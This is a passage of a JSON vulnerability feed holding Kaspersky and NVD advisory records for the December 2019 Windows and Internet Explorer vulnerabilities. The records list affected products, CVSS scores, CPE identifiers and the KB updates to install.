for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1483>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1489>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1465>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1476>) \n[CVE-2019-1471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1471>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1469>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1470](<https://nvd.nist.gov/vuln/detail/CVE-2019-1470>) \n[CVE-2019-1472](<https://nvd.nist.gov/vuln/detail/CVE-2019-1472>) \n[CVE-2019-1477](<https://nvd.nist.gov/vuln/detail/CVE-2019-1477>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1483](<https://vulners.com/cve/CVE-2019-1483>)7.2High \n[CVE-2019-1484](<https://vulners.com/cve/CVE-2019-1484>)6.8High \n[CVE-2019-1489](<https://vulners.com/cve/CVE-2019-1489>)5.0Critical \n[CVE-2019-1488](<https://vulners.com/cve/CVE-2019-1488>)2.1Warning \n[CVE-2019-1470](<https://vulners.com/cve/CVE-2019-1470>)4.0Warning \n[CVE-2019-1453](<https://vulners.com/cve/CVE-2019-1453>)5.0Critical \n[CVE-2019-1465](<https://vulners.com/cve/CVE-2019-1465>)4.3Warning \n[CVE-2019-1458](<https://vulners.com/cve/CVE-2019-1458>)7.2High \n[CVE-2019-1474](<https://vulners.com/cve/CVE-2019-1474>)2.1Warning \n[CVE-2019-1472](<https://vulners.com/cve/CVE-2019-1472>)2.1Warning \n[CVE-2019-1476](<https://vulners.com/cve/CVE-2019-1476>)7.2High \n[CVE-2019-1471](<https://vulners.com/cve/CVE-2019-1471>)6.5High \n[CVE-2019-1467](<https://vulners.com/cve/CVE-2019-1467>)4.3Warning \n[CVE-2019-1468](<https://vulners.com/cve/CVE-2019-1468>)9.3Critical \n[CVE-2019-1477](<https://vulners.com/cve/CVE-2019-1477>)7.2High \n[CVE-2019-1469](<https://vulners.com/cve/CVE-2019-1469>)2.1Warning \n[CVE-2019-1466](<https://vulners.com/cve/CVE-2019-1466>)4.3Warning\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530730](<http://support.microsoft.com/kb/4530730>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530698](<http://support.microsoft.com/kb/4530698>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4565503](<http://support.microsoft.com/kb/4565503>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "kaspersky", "title": "KLA11616 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1471", "CVE-2019-1472", "CVE-2019-1474", "CVE-2019-1476", "CVE-2019-1477", "CVE-2019-1483", "CVE-2019-1484", "CVE-2019-1488", "CVE-2019-1489"], "modified": "2023-05-22T00:00:00", "id": "KLA11616", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11616/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T15:12:22", "description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 8.1 for x64-based systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1709 for ARM64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1903 (Server Core installation) \nWindows 10 Version 1803 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2019 \nWindows Server, version 1909 (Server Core installation) \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1470](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1470>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1465](<https://nvd.nist.gov/vuln/detail/CVE-2019-1465>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1478](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1478>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1480](<https://nvd.nist.gov/vuln/detail/CVE-2019-1480>) \n[CVE-2019-1481](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1481>) \n[CVE-2019-1485](<https://nvd.nist.gov/vuln/detail/CVE-2019-1485>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1484](<https://vulners.com/cve/CVE-2019-1484>)6.8High \n[CVE-2019-1488](<https://vulners.com/cve/CVE-2019-1488>)2.1Warning \n[CVE-2019-1470](<https://vulners.com/cve/CVE-2019-1470>)4.0Warning \n[CVE-2019-1453](<https://vulners.com/cve/CVE-2019-1453>)5.0Critical \n[CVE-2019-1465](<https://vulners.com/cve/CVE-2019-1465>)4.3Warning \n[CVE-2019-1458](<https://vulners.com/cve/CVE-2019-1458>)7.2High \n[CVE-2019-1474](<https://vulners.com/cve/CVE-2019-1474>)2.1Warning \n[CVE-2019-1481](<https://vulners.com/cve/CVE-2019-1481>)4.3Warning \n[CVE-2019-1480](<https://vulners.com/cve/CVE-2019-1480>)4.3Warning \n[CVE-2019-1467](<https://vulners.com/cve/CVE-2019-1467>)4.3Warning \n[CVE-2019-1468](<https://vulners.com/cve/CVE-2019-1468>)9.3Critical \n[CVE-2019-1478](<https://vulners.com/cve/CVE-2019-1478>)7.2High \n[CVE-2019-1466](<https://vulners.com/cve/CVE-2019-1466>)4.3Warning \n[CVE-2019-1485](<https://vulners.com/cve/CVE-2019-1485>)7.6Critical\n\n### *KB list*:\n[4530695](<http://support.microsoft.com/kb/4530695>) \n[4530734](<http://support.microsoft.com/kb/4530734>) \n[4530719](<http://support.microsoft.com/kb/4530719>) \n[4530692](<http://support.microsoft.com/kb/4530692>) \n[4530677](<http://support.microsoft.com/kb/4530677>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "kaspersky", "title": "KLA11862 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1478", "CVE-2019-1480", "CVE-2019-1481", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-05-22T00:00:00", "id": "KLA11862", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T15:18:13", "description": "### *Detect date*:\n12/10/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Internet Explorer. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1485](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1485>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2019-1485](<https://vulners.com/cve/CVE-2019-1485>)7.6Critical\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530734](<http://support.microsoft.com/kb/4530734>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4530677](<http://support.microsoft.com/kb/4530677>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "kaspersky", "title": "KLA11619 ACE vulnerability in Microsoft Internet Explorer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2020-07-17T00:00:00", "id": "KLA11619", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11619/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-13T14:41:05", "description": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1465, CVE-2019-1466.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1467", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467"], "modified": "2019-12-11T18:52:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1467", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1467", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*"]}, {"lastseen": "2023-06-13T14:41:06", "description": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1465, CVE-2019-1467.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1466", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1466", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1466", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*"]}, {"lastseen": "2023-06-13T14:41:04", "description": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2019-1466, CVE-2019-1467.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-1465", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2019-1465", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1465", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", 